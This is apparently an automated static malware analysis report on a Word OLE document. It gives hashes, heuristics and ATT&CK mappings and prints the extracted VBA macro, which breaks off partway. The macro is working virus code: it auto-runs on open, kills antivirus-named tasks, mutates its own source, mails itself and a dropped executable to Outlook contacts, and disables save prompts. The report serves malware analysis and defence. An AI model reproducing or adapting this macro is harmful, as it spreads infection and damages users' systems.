Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5291caa365d1eb19…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 58.0 KB
Created: 2002-08-06 15:22:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: 8113f2d48c91c7412b4c9d46fc51578b
SHA-1: a38ee72fb8c91ce561df42f6b84f512a9e1d8c52
SHA-256: 5291caa365d1eb199e450ebb0cec1dda50b38fedb2744f2527ec1a1cae1080fc
Risk score: 262

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1059 Command and Scripting Interpreter

The sample is a malicious OLE document containing a VBA macro that executes upon opening. The macro attempts to write to the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows\Cow and then obfuscates its own code, likely to download and execute a secondary payload using Shell() and CreateObject calls. The obfuscated nature of the script and the use of Shell() indicate downloader or dropper functionality.

Heuristics (7)

  • VBA macros detected [medium] OLE_VBA_MACROS (5 related findings)
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://red.tripod.com (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8617 bytes
SHA-256: 71c858a7daa6370a3fe95fbf26f8852d129303a9bc3b22adfbb8dd6e7a14650d
First 1,000 lines of the extracted script:
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
On Error Resume Next '‰LQ'w5‡
'simulate "Cow" registry signature'pЌa'rxV
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Windows\", "Cow") <> "Moooo" Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Windows\", "Cow") = "Moooo" '=E 
End If 'wWk'O;Џ
'close any active AV tasks'8qE'tQ2
Set BLCMp = Tasks '3f‰'[7n
For PLQMp = 1 To BLCMp.Count '“yY'^L‹
If InStr(1, BLCMp(PLQMp).Name, "av", vbTextCompare) Or InStr(1, BLCMp(PLQMp).Name, "AV", vbTextCompare) Then
BLCMp(PLQMp).Close '[Ro'~ni
End If '-uz'[FI
Next PLQMp '#65'Ћm‚
'poly starts here:'_T'9__
Set BLCMp = ActiveDocument.VBProject '‚_…'JG:
Set BWJMp = BLCMp.VBComponents(1).CodeModule '|…v'b:3
If ThisDocument.FullName <> Templates(1).FullName Then 's4'tS‡
BFGMp = 18 'RJ9'o3P
ReDim CMSMp(1 To BFGMp) As String ',{u',q,
CMSMp(1) = "BFGMp": CMSMp(2) = "OXJMp": CMSMp(3) = "CMSMp": CMSMp(4) = "IWTMp" 'A|Q'~ej
CMSMp(5) = "IVPMp": CMSMp(6) = "PLQMp": CMSMp(7) = "BLCMp": CMSMp(8) = "CVOMp" '(ZX'RtW
CMSMp(9) = "HYHMp": CMSMp(10) = "CLCMp": CMSMp(11) = "LRLMp" ']G>'Bv0
CMSMp(12) = "WBIMp": CMSMp(13) = "MJOMp": CMSMp(14) = "AMCMp": CMSMp(15) = "CTIMp" 'Ђ‹G'O(Џ
CMSMp(16) = "GONMp": CMSMp(17) = "BWJMp": CMSMp(18) = "NFWMp" '-“]'3sD
'modify vars.'[ _''Y‚
For PLQMp = 1 To BFGMp '2}g'ђL5
Randomize '\Pv'(Nl
IVPMp = Chr(Int((25 * Rnd) + 65)) + Chr(Int((25 * Rnd) + 65)) + Chr(Int((25 * Rnd) + 65)) + "Mp" '€a†
For OXJMp = 2 To BWJMp.CountOfLines 'Ќ”\'z_w
CVOMp = BWJMp.Lines(OXJMp, 1) ']g9'wK@
If InStr(1, CVOMp, CMSMp(PLQMp), vbTextCompare) Then '4bb'$YK
CVOMp = Replace(CVOMp, CMSMp(PLQMp), IVPMp, 1, -1, vbTextCompare) 'BE?'Ѓ&v
BWJMp.ReplaceLine OXJMp, CVOMp 'BЂЋ'$…(
End If '9I.'ln/
Next OXJMp 'xz$''Ht
Next PLQMp 'Q!p'y.q
'Add random chars, but not too many, don't wanna increase the size too much :)'>$`'Sa!
For PLQMp = 2 To BWJMp.CountOfLines '7p''Ifѓ
CVOMp = BWJMp.Lines(PLQMp, 1) '‰3*'36W
If Len(CVOMp) <= 100 Then '0ЋX'Dw}
CVOMp = CVOMp + "'" + Chr(Int((120 * Rnd) + 32)) + Chr(Int((120 * Rnd) + 32)) + Chr(Int((120 * Rnd) + 32))
BWJMp.ReplaceLine PLQMp, CVOMp '+ak'.E!
End If 'Ђ”a'>‘?
Next PLQMp '%d ',QQ
End If 'Ћg.'G}—
'Actual virus'€€a''Rk
'-------------------------------------------------------------------'2G!'E N
'E-mail spread'‚\&'T$Q
'C:\installs.exe contains W32/Baboon'{•'T†D
FileCopy "C:\os4321.sys", "C:\installs.exe" '‚‹_'E‹?
WBIMp = Chr(79) + Chr(117) + Chr(116) + Chr(108) + Chr(111) + Chr(111) + Chr(107) 'znM'"e+
Set HYHMp = CreateObject(WBIMp + Chr(46) + Chr(65) + Chr(112) + Chr(112) + Chr(108) + Chr(105) + Chr(99) + Chr(97) + Chr(116) + Chr(105) + Chr(111) + Chr(110))
MJOMp = Chr(77) + Chr(65) + Chr(80) + Chr(73) 'Ma\'ЋX6
Set CLCMp = HYHMp.GetNameSpace(MJOMp) 'Uod'mL,
Set WBIMp = CLCMp.AddressLists ',Њu'e‚&
For PLQMp = 1 To WBIMp.Count 'J2{'oKF
Set ABook = CLCMp.AddressLists(PLQMp) 'J p'8XO
MJOMp = 1 '!Qk'6#!
Set AMCMp = ABook.AddressEntries 'nxW'•!$
Set LRLMp = HYHMp.CreateItem(0) '%“R' VP
For GONMp = 1 To AMCMp.Count '€xV'wO‰
CTIMp = AMCMp(MJOMp) '_#%'pW 
LRLMp.Recipients.Add CTIMp 'OIЌ'0Ѓh
MJOMp = MJOMp + 1 'm)%'“-o
If MJOMp > 20 Then BFGMp = AMCMp.Count 'Ђ=w'ЌqB
Next GONMp '#G]'Q5k
IVPMp = ActiveDocument.FullName 'lYx'S</
LRLMp.Subject = "hya" 'Ca9'trG
LRLMp.Body = "some kewl stuff." 'L*D'bf}
LRLMp.Attachments.Add IVPMp '{Zu'#th
LRLMp.Attachments.Add "C:\installs.exe" 'zp;'eHЏ
LRLMp.Send 'C†.'|ѓd
CTIMp = "" 'ЋS+'b24
Next PLQMp 'sbq'J%P
'Check if is already infected'.^f'S~P
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Red") <> "Red Guy" Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Red") = "Red Guy" '>kd
'No more security'‘‘^'l+Џ
Options.SaveNormalPrompt = 5 Xor 5 ';?M'{W0
Comma
... (truncated)